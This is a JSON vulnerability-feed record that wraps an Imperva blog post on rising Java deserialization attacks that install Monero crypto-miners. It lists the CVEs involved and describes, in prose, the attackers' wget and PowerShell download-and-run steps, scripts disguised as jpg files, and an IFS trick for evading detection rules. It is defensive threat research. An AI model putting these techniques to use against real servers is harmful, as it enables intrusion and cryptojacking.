"https://www.kb.cert.org/vuls/id/576313", "type": "cert", "title": "Apache Commons Collections Java library insecurely deserializes data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2018-01-25T09:59:26", "bulletinFamily": "blog", "description": "Imperva\u2019s research group is constantly monitoring new web application vulnerabilities. In doing so, we\u2019ve noticed at least four major insecure deserialization vulnerabilities that were published in the past year.\n\nOur analysis shows that, in the past three months, the number of deserialization attacks has grown by 300 percent on average, turning them into a serious security risk to web applications.\n\nTo make things worse, many of these attacks are now launched with the intent of installing crypto-mining malware on vulnerable web servers, which gridlocks their CPU usage.\n\nIn this blog post we will explain what insecure deserialization vulnerabilities are, show the growing trend of attacks exploiting these vulnerabilities and explain what attackers do to exploit them (including real-life attack examples).\n\n## What Is Serialization?\n\nThe process of serialization converts a \u201clive\u201d object (structure and/or state), like a Java object, into a format that can be sent over the network, or stored in memory or on disk. Deserialization converts the format back into a \u201clive\u201d object.\n\nThe purpose of serialization is to preserve an object, meaning that the object will exist outside the lifetime of the local machine on which it is created.\n\nFor example, when withdrawing money from an ATM, the information of the account holder and the required operation is stored in a local object. Before this object is sent to the main server, it is serialized in order to perform and approve the needed operations. 
The server then deserializes the object to complete the operation.\n\n## Types of Serialization\n\nThere are many types of [serialization](<https://en.wikipedia.org/wiki/Serialization#Serialization_formats>) available, depending on the object which is being serialized and on the purpose. Almost all modern programming languages support serialization. In Java for example an object is converted into a compact representation using byte stream, and the byte stream can then be reverted back into a copy of that object.\n\nOther types of serialization include converting an object into a hierarchical format like JSON or XML. The advantage of this serialization is that the serialized objects can be read as plain text, instead of a byte stream.\n\n## Deserialization Vulnerabilities from the Past Three Months\n\nIn the [OWASP top 10 security risks of 2017](<https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf>) insecure deserialization came in at [eighth place](<https://www.owasp.org/index.php/Top_10-2017_A8-Insecure_Deserialization>) and rightfully so as we argued in our [previous blog](<https://www.imperva.com/blog/2017/12/the-state-of-web-application-vulnerabilities-in-2017/>) about the state of web application vulnerabilities in 2017.\n\nIn 2017, major new vulnerabilities related to insecure serialization, mostly in Java, were published (see Figure 1).\n\n**Name** | **Release Date (Day/Month/Year)** | **Vulnerability details** \n---|---|--- \nCVE-2017-12149 | 01/08/2017 | Vulnerability in the JBoss Application Server allows execution of arbitrary code via crafted serialized data because the HTTP Invoker does not restrict classes for which it performs deserialization \nCVE-2017-10271 | 21/06/2017 | Vulnerability in the Oracle WebLogic Server allows execution of arbitrary code due to insufficient sanitizing of user supplied inputs in the wls-wsat component \nCVE-2017-9805\n\n | 21/06/2017 | The REST Plugin in Apache Struts uses an XStreamHandler with an 
instance of XStream for deserialization without any type filtering, which can lead to remote code execution when deserializing XML payloads. \nCVE-2017-7504 | 05/04/2017 | The HTTPServerILServlet.java in JMS allows remote attackers to execute arbitrary code via crafted serialized data because it does not restrict the classes for which it performs deserialization \n \n_Figure 1: CVEs related to insecure deserialization_\n\nIn order to understand the magnitude of these vulnerabilities, we analyzed attacks from the past three months (October to December of 2017) that try to exploit insecure deserialization. A key observation is the _steep_ increase of deserialization attacks in the past few months, as can be seen in the Figure 2.\n\n \n_Figure 2: Insecure deserialization attacks over the course of three months_\n\nMost of the attackers used no attack vectors other than insecure deserialization. We noticed that each attacker was trying to exploit different vulnerabilities, with the above-mentioned CVEs being the most prevalent.\n\nFor a full list of CVEs related to insecure deserialization from the past few years see Figure 3.\n\n**Name** | **Relevant System** | **Public Exploit** | **Name** | **Relevant System** | **Public Exploit** \n---|---|---|---|---|--- \nCVE-2017-9844 | SAP NetWeaver | Yes | CVE-2016-2170 | Apache OFBiz | No \nCVE-2017-9830 | Code42 CrashPlan | No | CVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No \nCVE-2017-9805 | Apache Struts | Yes | CVE-2016-2000 | HP Asset Manager | No \nCVE-2017-7504 | Red Hat JBoss | Yes | CVE-2016-1999 | HP Release Control | No \nCVE-2017-5878 | Apache OpenMeetings | Yes | CVE-2016-1998 | HP Service Manager | No \nCVE-2017-5645 | Apache Log4j | No | CVE-2016-1997 | HP Operations Orchestration | No \nCVE-2017-5641 | Apache BlazeDS | Yes | CVE-2016-1986 | HP Continuous Delivery Automation | No \nCVE-2017-5586 | OpenText Documentum D2 | Yes | CVE-2016-1985 | HP Operations Manager | No 
\nCVE-2017-3159 | Apache Camel | Yes | CVE-2016-1487 | Lexmark Markvision Enterprise | No \nCVE-2017-3066 | Adobe ColdFusion | Yes | CVE-2016-1291 | Cisco Prime Infrastructure | Yes \nCVE-2017-2608 | Jenkins | Yes | CVE-2016-0958 | Adobe Experience Manager | No \nCVE-2017-12149 | Red Hat JBoss | Yes | CVE-2016-0788 | Jenkins | Yes \nCVE-2017-11284 | Adobe ColdFusion | No | CVE-2016-0779 | Apache TomEE | No \nCVE-2017-11283 | Adobe ColdFusion | No | CVE-2016-0714 | Apache Tomcat | No \nCVE-2017-1000353 | CloudBees Jenkins | Yes | CVE-2015-8765 | McAfee ePolicy Orchestrator | No \nCVE-2016-9606 | Resteasy | Yes | CVE-2015-8581 | Apache TomEE | No \nCVE-2016-9299 | Jenkins | Yes | CVE-2015-8545 | NetApp | No \nCVE-2016-8749 | Jackson (JSON) | Yes | CVE-2015-8360 | Atlassian Bamboo | No \nCVE-2016-8744 | Apache Brooklyn | Yes | CVE-2015-8238 | Unify OpenScape | No \nCVE-2016-8735 | Apache Tomcat JMX | Yes | CVE-2015-8237 | Unify OpenScape | No \nCVE-2016-7462 | VMWare vRealize Operations | No | CVE-2015-8103 | Jenkins | Yes \nCVE-2016-6809 | Apache Tika | No | CVE-2015-7501 | Red Hat JBoss | Yes \nCVE-2016-5229 | Atlassian Bamboo | Yes | CVE-2015-7501 | Oracle Application Testing Suite | No \nCVE-2016-5004 | Apache Archiva | Yes | CVE-2015-7450 | IBM Websphere | Yes \nCVE-2016-4385 | HP Network Automation | No | CVE-2015-7253 | Commvault Edge Server | Yes \nCVE-2016-4372 | HP iMC | No | CVE-2015-6934 | VMWare vCenter/vRealize | No \nCVE-2016-3642 | Solarwinds Virtualization Manager | Yes | CVE-2015-6576 | Atlassian Bamboo | No \nCVE-2016-3461 | Oracle MySQL Enterprise Monitor | Yes | CVE-2015-6555 | Symantec Endpoint Protection Manager | Yes \nCVE-2016-3427 | JMX | Yes | CVE-2015-6420 | Cisco (various frameworks) | No \nCVE-2016-3415 | Zimbra Collaboration | No | CVE-2015-5348 | Apache Camel | No \nCVE-2016-2510 | Red Hat JBoss BPM Suite | No | CVE-2015-5254 | Apache ActiveMQ | No \nCVE-2016-2173 | Spring AMPQ | No | CVE-2015-4852 | Oracle WebLogic | Yes 
\nCVE-2016-2170 | Apache OFBiz | No | CVE-2015-3253 | Jenkins | Yes \nCVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No | CVE-2012-4858 | IBM Cognos BI | No \n \n_Figure 3: CVEs related to insecure deserialization_\n\n## Deserialization Attacks in the Wild\n\nMost of the attacks that we saw are related to byte-stream serialization of Java objects. We also saw some attacks related to serialization to XML and other formats (see Figure 4).\n\n \n_Figure 4: Distribution of vulnerabilities over different serialization formats_\n\nIn the following attack (see Figure 5) the attacker is trying to exploit CVE-2017-10271. The payload is sent in the HTTP request\u2019s body using a serialized Java object through XML representation.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-serialized-java-array-into-XML-fig-5.png>)\n\n_Figure 5: Attack vector containing a serialized java array into an XML_\n\nThe fact that this is a Java array can be seen by the hierarchical structure of the parameters, with the suffix of **\u201cjava/void/array/void/string\u201d**. The attacker is trying to run a bash script on the attacked server.\n\nThis bash script tries to send an HTTP request using the \u201cwget\u201d OS command, download a shell script disguised as a picture file (note the jpg file extension) and run it. A few interesting notes can be made when examining this command:\n\n * The existence of shell and \u201cwget\u201d commands indicates that this payload is targeting Linux systems\n * Using a picture file extension is usually done to evade security controls\n * The **\u201c-q\u201d** parameter to \u201cwget\u201d stands for \u201cquiet\u201d; this means that \u201cwget\u201d will have no output to the console, hence it will be harder to notice that such a request was even made. 
Once the downloaded script runs, the server is infected with crypto mining malware that tries to mine Monero digital coins (a cryptocurrency similar to Bitcoin).\n\nThe next script (see Figure 6) tries to exploit the same vulnerability, but this time the payload is targeting Windows servers using cmd.exe and PowerShell commands to download the malware and run it.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-infect-Windows-server-with-crypto-mining-malware-fig-6.png>)\n\n_Figure 6: Attack vector trying to infect Windows server with crypto mining malware_\n\nThis indicates that there are two different infection methods for Windows and Linux servers, each system with its designated script.\n\nAnother example is the following payload (Figure 7) that we pulled from an attack trying to exploit a [deserialization vulnerability](<http://seclists.org/oss-sec/2016/q1/461>) with a Java serialized object.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-java-serialized-object.jpg>)\n\n_Figure 7: Attack vector containing a Java serialized object trying to download a crypto miner_\n\nThe \u201cbad\u201d encoding is an artifact of Java serialization, where the object is represented in the byte stream.\n\nStill, we can see a script in plain text marked in yellow. Shown as an image below is a variable that defines an internal field separator, where in this case it is just a variable for space. 
The variable is probably used instead of a space to try to make the payload harder to detect. Detection rules that expect a literal space between command tokens may therefore miss it.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/insert-into-paragraph.jpg>)\n\nJust as in the previous examples, this Bash script targets Linux servers and sends an HTTP request using \u201cwget\u201d to download a crypto miner.\n\n## Beyond Insecure Deserialization\n\nThe common denominator of the attacks above is that attackers are trying to infect the server with crypto mining malware by using an insecure deserialization vulnerability. However, insecure deserialization is not the only method to achieve this goal.\n\nBelow (Figure 8) we see an example of another attack payload, this time in the \u201cContent-Type\u201d header.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-using-RCE-vulnerability-of-Apache-Struts-fig-8.jpg>)\n\n_Figure 8: Attack vector using an RCE vulnerability of Apache Struts_\n\nThis attack tries to exploit **CVE-2017-5638**, a well-known RCE vulnerability related to Apache Struts which was published in March 2017 and was covered in a [previous blog post](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>).\n\nWhen it was originally published, we saw no indications of crypto miners in the attacks\u2019 payloads related to this CVE, and most of the payloads were reconnaissance attacks.\n\nHowever, in this attack the payload (marked in yellow above) is very similar to the payload from the previous example. 
Using the same remote server and the exact same script, it infected the server with crypto mining malware.\n\nThis old attack method with a new payload suggests a new trend in the cyber arena \u2013 attackers try to exploit RCE vulnerabilities, new and old, to turn vulnerable servers into crypto miners and get a faster ROI for their \u201ceffort\u201d.\n\n## Recommendations\n\nGiven the many new vulnerabilities related to insecure deserialization that were discovered this year, and its appearance in the OWASP top 10 security risks, we expect to see newer related vulnerabilities released in 2018. In the meantime, organizations using affected servers are advised to apply the latest patches to mitigate these vulnerabilities.\n\nAn alternative to manual patching is virtual patching. Virtual patching actively protects web applications from attacks, reducing the window of exposure and decreasing the cost of emergency patches and fix cycles. It does not remove the flaw from the application itself, so the vendor patch should still be applied.\n\nA WAF that provides virtual patching doesn\u2019t interfere with the normal application workflow, and keeps the site protected while allowing the site owners to control the patching process timeline.\n\nLearn more about how to protect your web applications from vulnerabilities with [Imperva WAF solutions](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>).", "modified": "2018-01-24T17:45:08", "published": "2018-01-24T17:45:08", "id": "IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "href": "https://www.imperva.com/blog/2018/01/deserialization-attacks-surge-motivated-by-illegal-crypto-mining/", "type": "impervablog", "title": "Deserialization Attacks Surge Motivated by Illegal Crypto-mining", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}